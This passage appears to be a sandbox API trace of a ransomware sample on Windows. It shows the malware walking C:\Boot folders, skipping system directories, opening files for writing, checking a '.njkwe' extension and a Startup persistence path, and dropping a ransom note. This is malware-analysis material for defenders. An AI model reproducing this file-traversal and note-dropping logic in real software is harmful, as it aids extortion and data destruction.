cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.238] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\sv-se\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.239] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.240] CloseHandle (hObject=0x428) returned 1 [0065.240] GetProcessHeap () returned 0xbe0000 [0065.240] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.240] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206504, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6b5aca, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0065.240] lstrcmpiW (lpString1="tr-TR", lpString2="Windows") returned -1 [0065.240] lstrcmpiW (lpString1="tr-TR", lpString2="$Recycle.bin") returned 1 [0065.240] lstrcmpiW (lpString1="tr-TR", lpString2="System Volume Information") returned 1 [0065.240] lstrcmpiW (lpString1="tr-TR", lpString2="Program Files") returned 1 [0065.241] lstrcmpiW (lpString1="tr-TR", lpString2="Program Files (x86)") returned 1 [0065.241] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR") returned 17 [0065.241] lstrcmpW (lpString1="tr-TR", lpString2=".") returned 1 [0065.241] lstrcmpW (lpString1="tr-TR", lpString2="..") returned 1 [0065.241] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\tr-TR", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.241] GetProcessHeap () returned 0xbe0000 [0065.241] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.241] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\*") returned 19 [0065.241] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\tr-TR\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206504, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6b5aca, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ca0 [0065.241] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.241] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.241] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.241] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.241] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.241] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\.") returned 19 [0065.241] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.241] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206504, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6b5aca, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.241] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.241] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.241] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.241] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.241] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.241] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\..") returned 20 [0065.241] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.241] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.241] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12558, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.241] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.241] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.241] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.241] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.241] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.242] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned 33 [0065.242] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.242] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.242] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.242] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.242] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.242] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6b5aca, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f4373a, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0065.242] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0065.243] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.243] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0065.243] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0065.243] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.243] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\memtest.exe.mui") returned 33 [0065.243] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.243] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.243] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0065.243] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\tr-TR\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.243] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\memtest.exe.mui" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.243] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6b5aca, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f4373a, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0065.243] FindClose (in: hFindFile=0xc19ca0 | out: hFindFile=0xc19ca0) returned 1 [0065.243] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.243] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\tr-tr\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.245] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.246] CloseHandle (hObject=0x428) returned 1 [0065.246] GetProcessHeap () returned 0xbe0000 [0065.246] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.246] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206a30, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0065.246] lstrcmpiW (lpString1="uk-UA", lpString2="Windows") returned -1 [0065.246] lstrcmpiW (lpString1="uk-UA", lpString2="$Recycle.bin") returned 1 [0065.246] lstrcmpiW (lpString1="uk-UA", lpString2="System Volume Information") returned 1 [0065.246] lstrcmpiW (lpString1="uk-UA", lpString2="Program Files") returned 1 [0065.246] lstrcmpiW (lpString1="uk-UA", lpString2="Program Files (x86)") returned 1 [0065.246] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\uk-UA") returned 17 [0065.246] lstrcmpW (lpString1="uk-UA", lpString2=".") returned 1 [0065.246] lstrcmpW (lpString1="uk-UA", lpString2="..") returned 1 [0065.246] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\uk-UA", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.246] GetProcessHeap () returned 0xbe0000 [0065.246] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.246] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\uk-UA\\*") returned 19 [0065.246] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\uk-UA\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206a30, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ea0 [0065.247] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.247] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.247] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.247] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.247] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.247] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\uk-UA\\.") returned 19 [0065.247] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.247] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206a30, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.247] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.247] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.247] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.247] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.247] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.247] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\uk-UA\\..") returned 20 [0065.247] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.247] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.247] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.247] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.247] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.247] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.247] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.247] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.247] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\uk-UA\\bootmgr.exe.mui") returned 33 [0065.247] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.247] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.247] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.247] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\uk-UA\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.247] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\uk-UA\\bootmgr.exe.mui" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.248] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0065.248] FindClose (in: hFindFile=0xc19ea0 | out: hFindFile=0xc19ea0) returned 1 [0065.248] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\uk-UA\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.248] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\uk-UA\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\uk-ua\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.248] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.249] CloseHandle (hObject=0x428) returned 1 [0065.249] GetProcessHeap () returned 0xbe0000 [0065.249] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.249] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef6c9427, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef6c9427, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1236, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="updaterevokesipolicy.p7b", cAlternateFileName="UPDATE~1.P7B")) returned 1 [0065.249] lstrcmpiW (lpString1="updaterevokesipolicy.p7b", lpString2="Windows") returned -1 [0065.249] lstrcmpiW (lpString1="updaterevokesipolicy.p7b", lpString2="$Recycle.bin") returned 1 [0065.249] lstrcmpiW (lpString1="updaterevokesipolicy.p7b", lpString2="System Volume Information") returned 1 [0065.249] lstrcmpiW (lpString1="updaterevokesipolicy.p7b", lpString2="Program Files") returned 1 [0065.249] lstrcmpiW (lpString1="updaterevokesipolicy.p7b", lpString2="Program Files (x86)") returned 1 [0065.249] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\updaterevokesipolicy.p7b") returned 36 [0065.249] StrStrIW (lpFirst="updaterevokesipolicy.p7b", lpSrch=".njkwe") returned 0x0 [0065.249] lstrcmpW (lpString1="updaterevokesipolicy.p7b", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.249] lstrcmpW (lpString1="updaterevokesipolicy.p7b", lpString2="taridd") returned 1 [0065.249] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\updaterevokesipolicy.p7b", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.249] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.250] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207100, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6d7e9a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0065.250] lstrcmpiW (lpString1="zh-CN", lpString2="Windows") returned 1 [0065.250] lstrcmpiW (lpString1="zh-CN", lpString2="$Recycle.bin") returned 1 [0065.250] lstrcmpiW (lpString1="zh-CN", lpString2="System Volume Information") returned 1 [0065.250] lstrcmpiW (lpString1="zh-CN", lpString2="Program Files") returned 1 [0065.250] lstrcmpiW (lpString1="zh-CN", lpString2="Program Files (x86)") returned 1 [0065.250] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN") returned 17 [0065.250] lstrcmpW (lpString1="zh-CN", lpString2=".") returned 1 [0065.250] lstrcmpW (lpString1="zh-CN", lpString2="..") returned 1 [0065.250] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\zh-CN", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.250] GetProcessHeap () returned 0xbe0000 [0065.250] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.250] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\*") returned 19 [0065.250] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-CN\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207100, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6d7e9a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a3e0 [0065.251] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.251] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.251] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.251] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.251] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.251] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\.") returned 19 [0065.251] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.251] FindNextFileW (in: hFindFile=0xc1a3e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207100, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6d7e9a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.251] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.251] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.251] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.251] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.251] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.251] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\..") returned 20 [0065.251] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.251] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.251] FindNextFileW (in: hFindFile=0xc1a3e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf960, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.251] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.251] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.251] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.251] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.251] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.251] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned 33 [0065.252] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.252] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.252] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.252] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.252] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.252] FindNextFileW (in: hFindFile=0xc1a3e0, lpFindFileData=0x380f820 | out: 